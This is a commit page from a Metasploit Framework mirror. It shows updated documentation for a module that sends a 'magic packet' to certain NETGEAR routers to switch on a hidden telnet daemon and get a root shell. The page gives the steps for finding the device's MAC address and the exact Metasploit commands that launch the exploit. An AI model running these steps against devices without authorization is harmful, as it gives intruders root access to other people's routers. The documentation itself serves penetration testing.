infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

updated docs

GSoC/Meterpreter_Web_Console
h00die 2018-03-01 20:16:14 -05:00 committed by William Vu
parent a9caec5130
commit 031b44baea
1 changed files with 24 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

26
documentation/modules/exploit/linux/telnet/netgear_telnetenable.md
View File

@ -1,10 +1,32 @@
## Intro
> This module sends a magic packet to a NETGEAR device to enable telnetd. Upon successful connect, a root shell should be presented to the user.
Several models of Netgear devices hav ea hidden telnet daemon that can be
enabled for remote LAN users by sending a 'magic packet' to the device.
Upon successful connect, a root shell should be presented to the user.
There are many devices which contain this daemon, for a full list see [OpenWrt](https://wiki.openwrt.org/toh/netgear/telnet.console)
This module has been successfully tested against:
- N300 WNR2000 v3
## Setup
1. Buy a NETGEAR device
A MAC address is required for exploitation. To determine the MAC address of the device:
1. Ping the device to force an ARP lookup: ```ping -c 1 [IP]```
2. Get the MAC: ```arp -an [IP]```
## Exploitation
1. Make sure you have a vulnerable device
2. Start metasploit
3. ```use exploit/linux/telnet/netgear_telnetenable```
4. ```set rhost [IP]```
5. ```set mac [MAC Address]```
6. ```exploit```
7. Enjoy a root shell!
## Usage